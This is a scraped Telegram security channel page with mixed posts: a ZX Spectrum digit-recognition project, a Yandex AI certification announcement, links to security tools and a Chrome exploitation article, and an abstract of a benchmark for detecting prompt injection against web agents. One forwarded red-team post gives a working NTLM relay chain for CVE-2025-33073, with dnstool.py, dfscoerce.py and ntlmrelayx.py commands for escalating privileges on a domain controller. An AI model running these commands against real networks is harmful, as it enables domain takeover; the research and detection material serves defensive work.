Zeropticum🫡 – Telegram
Zeropticum🫡
120 subscribers
106 photos
5 videos
30 files
262 links
Make security greate again!

Contact - @ArtemiyUeax
Download Telegram
Пятница! 🌝

Представьте: вы открываете чердак и находите пыльный ZX Spectrum. «Музейный экспонат», — думаете вы. А что если я скажу, что эта коробка с 48 килобайтами памяти может с 95.5% точностью распознавать рукописные цифры и проходить те самые CAPTCHA-тесты «Я не робот» из 2010-х?

Более того: технически она могла это делать с момента выпуска в 1982 году. Мы просто не знали правильный алгоритм 43 года.

График эволюции точности выглядит как американские горки:

Точность | Что произошло
---------|--------------------------------------------------
9.3% | Наивные правила: "много пикселей внизу = цифра 2"
50.1% | Прорыв: обучение с учителем заработало
65.6% | Sparse binary features (автоматические AND-комбинации)
70.9% | Больше данных + L2-регуляризация
75.5% | Сделала Z80-совместимой (самый сложный этап!)
83.0% | Революция: fuzzy matching через XOR+popcount
95.5% | Финал: простое голосование 9 перспектив


Каждый процент — это куча экспериментов. Всего получилось 70 статей документации (да, я немного ёкнулась на документировании процесса).

Это чистая правда, в репе https://github.com/oisee/mnist-z80 всё описано максимально подробно.

И там куча всего прикольного сделано. Например

Главная проблема: Z80 не умеет умножать

У Z80 нет инструкций для:

- Умножения (MUL)
- Деления (DIV)
- Экспоненты (EXP)
- Логарифма (LOG)

Решение: ансамбль линейных регрессий

Ключевые трюки для Z80

1. Popcount через таблицу поиска
2. Fuzzy matching (нечёткое сравнение)
3. Линейная регрессия без умножений


Что дальше?

Сейчас я работаю над портированием на другие 8-битные системы:


- Apple II (6502) — другая архитектура, те же принципы
- Commodore 64 (6510) — 64КБ для экспериментов!
- БК-0010 (К1801ВМ1) — советская 16-битная PDP-11 совместимая
- Атари 800 (6502) — игровая консоль как ИИ-платформа

Каждый порт доказывает: ВСЕ компьютеры конца 70-х были ИИ-способными. Мы просто не знали как.

ZX Spectrum проходит тест Тьюринга: учим 8-битный процессор проходить CAPTCHA
https://habr.com/ru/articles/928964/

Англоязычное описание безумия
https://github.com/oisee/mnist-z80/blob/master/article.md
Forwarded from Yandex for Security
💕 AI Яндекса официально безопасен и этичен

Мы первыми в России прошли сертификацию ISO 42001. Независимые аудиторы подтвердили, что Яндекс ответственно подходит к созданию и внедрению AI в продукты.

〰️ Что такое ISO 42001

Это международный стандарт для систем менеджмента в организациях, которые разрабатывают или используют решения на основе AI. Он оценивает не сами продукты и технологии, а то, насколько прозрачно, безопасно и эффективно действует компания при разработке и внедрении AI в сервисы.

〰️ Аудит также подтвердил, что мы:

🟣 Обеспечиваем безопасность данных пользователей YandexGPT
🟣 Автоматически мониторим ошибки и аномалии в работе моделей
🟣 Следим за качеством и этичностью ответов
🟣 Анализируем обратную связь от пользователей
🟣 Ведём подробную документацию
🟣 Учитываем этические и социальные риски, которые связаны с развитием AI
🟣 Обучаем сотрудников правилам ответственной разработки

〰️ Какие сервисы Яндекса затрагивает сертификат

Все, в которых есть технологии на базе YandexGPT. Таких у нас больше 20 штук, среди них: Поиск, AI-ассистент Алиса, Нейроэксперт, Реклама, Шедеврум, Умная камера, AI-ассистенты в Яндекс Еде, Маркете и Лавке. А ещё наш AI используют клиенты платформы Yandex Cloud AI Studio.

Подписывайтесь:
💬 @Yandex4Security
📹 @YandexForSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент аудита безопасности Cisco IOS, который позволяет оценить защищенность маршрутизаторов и коммутаторов Cisco.

https://github.com/casterbyte/Nihilist
100-pravil-projectov-NASA.pdf
734.1 KB
Понравились 100 правил руководителей проектов
NASA. Взято с поста:

https://news.1rj.ru/str/tech_b0lt_Genona/5513

+ сам док
Forwarded from OPERATION ZERO RU
101 Chrome Exploitation — Part 1: Architecture

Опубликовали новую статью по эксплуатации Chrome. В ней описана архитектура браузера, его основные компоненты (движок рендеринга Blink, движок JavaScript V8, сетевой стек), а также упражнение, в котором читатели добавят свою функцию в API Blink. Приятного чтения.

https://opzero.ru/press/101-chrome-exploitation-part-1-architecture/
🔥1🤯1
Forwarded from CyberSecurityTechnologies
web_agents_inject.pdf
5.6 MB
#AIOps
#MLSecOps
"WAInjectBench: Benchmarking Prompt Injection Detections for Web Agents", 2025.
]-> Comprehensive benchmark for prompt injection detection in web agents

// we presenting the first comprehensive benchmark study on detecting prompt injection attacks targeting web agents. We construct datasets containing both malicious and benign samples: malicious text segments generated by different attacks, benign text segments from four categories, malicious images produced by attacks, and benign images from two categories
WAVSEP - это уязвимое веб-приложение, разработанное для оценки возможностей, качества и точности сканеров уязвимостей веб-приложений.
Содержит коллекцию уникальных уязвимых веб-страниц, которые можно использовать для тестирования различных свойств сканеров веб-приложений. 2015 год...

https://github.com/sectooladdict/wavsep
CrossGuard: Safeguarding MLLMs against Joint-Modal Implicit Malicious Attacks
https://github.com/AI45Lab/MLLMGuard
Forwarded from Proxy Bar
CVE-2025-59287
*
WSUS Remote Code Execution

writeUp + POC
Forwarded from RedTeam brazzers (Миша)
Всем привет!

А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )

Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так: echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.

Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )

Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
1
Список инструментов, статей и ресурсов, которые используют большие языковые модели (LLM) для обратного проектирования (RE), декомпиляции, бинарного анализа и исследований в области кибербезопасности.

https://github.com/ram-elgov/awesome-llm-reverse-engineering